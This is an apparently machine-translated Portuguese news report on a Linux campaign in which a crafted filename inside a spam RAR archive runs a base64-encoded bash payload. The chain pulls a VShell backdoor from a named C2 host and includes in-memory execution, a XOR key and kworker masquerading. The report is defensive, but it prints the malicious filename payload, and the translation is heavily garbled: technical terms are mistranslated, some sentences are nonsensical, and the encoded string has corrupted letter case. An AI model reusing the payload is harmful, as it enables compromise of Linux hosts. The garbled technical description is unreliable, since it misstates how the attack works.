Ameaça furtiva Unpacked: Arquivos RAR armas entregam o VSHELL BACKDOOR nos sistemas Linux

O Trellix Advanced Research Center expôs uma cadeia de infecções que não arma nada mais que um nome de arquivo para comprometer os hosts do Linux.

Uma mensagem de spam disfarçada de pesquisa de produtos de beleza oferece uma pequena recompensa e carrega um arquivo rar, yy.rar. Quando descompactado, o arquivo solta um único arquivo cujo nome é um programa em miniatura: ziliao2.pdf {echo, kgn1cmwglwzzu0wglw0xodagahr0cdovlzq3ljk4lje5nc42mdo4mdg0l3nsd3x8 d2dldCatvDe4MCATCSBODHRWOI8VNDCUOTGUMTK0LJYWOJGWODQVC2X3KXXZACAG} _ {base64, -d} _bash

Os aparelhos exploram a sintaxe da “expansão do processo” do Bash. Qualquer loop não sedutor que enumera nomes de arquivos pense em f em *; Echo “$ f” ou uma avaliação em torno de um LS avalia cegamente o conteúdo dentro do aparelho, ecoando uma blob Base64, decodificando -o em tempo real e canalizando o texto simples a serem criticados.

Nenhum bit ou macro executável convencional é necessário; Um script de inventário de rotina ou coletor de log é suficiente para detonar a carga útil.

O script de estágio 1 decodificado chega a 47.98.194.60:8084 e silenciosamente pega um segundo download da festa.

A persistência é alcançada pela expansão do caminho e investigando diretórios graváveis, como /tmp, /usr /local /bin e /usr /libexec.

A CPU do host é a CPU do host (x86_64, i386, armv7l, aarch64) e puxa o carregador de elfo correspondente e chama -o com nohup em segundo plano para sobreviver às terminações da sessão.

Cada tentativa de cópia é embrulhada em redirecionamento para /dev /null, minimizando artefatos forenses no disco.

O carregador elfo do estágio-2, fortemente associado à família da luz de neve, constrói um HTTP que contém a etiqueta do host, o identificador de arquitetura e a porta de escuta e, em seguida, coleta uma bolha binária binária com xor.

Uma chave de byte única (0x99) é aplicada na memória, após a qual o programa executa a carga útil resultante via fexecve (), mantendo o disco de backdoor fora completamente. Para evitar infecções duplicadas, um arquivo marcador /tmp/log_de.log é verificado antes do lançamento.

Finalmente, o processo ‘argv é reescrito para imitar um tópico de trabalhador benigno do kernel [kworker/0:2] permitindo que ele se esconda à vista da vista durante o PS ou as principais inspeções.

Recursos de backdoor vshell

A carga útil descriptografada é o VSHELL, uma ferramenta de acesso remoto baseado em GO, preferido por várias equipes chinesas. O vshell fornece interativo conchas reversas.

Seu canal HTTP C2 é envolvido em rotinas XOR personalizadas e seus binários são compilados para várias arquiteturas, tornando a campanha igualmente perigosa para servidores em nuvem, aparelhos de IoT e estações de trabalho de desenvolvimento.

De acordo com o relatórioA campanha ignora três camadas de detecção tradicionais de uma só vez: os motores antivírus raramente examinam nomes de arquivos, os scanners estáticos perdem a cadeia de desosco e as ferramentas comportamentais não podem sinalizar a execução até que o nome do arquivo seja expandido.

Como muitos devOps, backup e monitoramento dos scripts iteram através de diretórios sem higienizar a entrada, a técnica arma a própria transparência e flexibilidade que tornam o Linux atraente.

A mitigação requer uma estritura de sinalização de entrada (por exemplo, printf ‘%q’ para nomes de arquivos), a remoção de avaliação de scripts de manutenção e monitoramento para saída anômala Solicitações HTTP de binários transitórios em /tmp ou /usr /local /bin. As equipes de segurança também devem procurar fios de kernel falsos e usos incomuns da Fexecve.

Indicadores de compromisso

Encontre esta notícia interessante! Siga -nosGoogle NewsAssim,LinkedIneXPara obter atualizações instantâneas!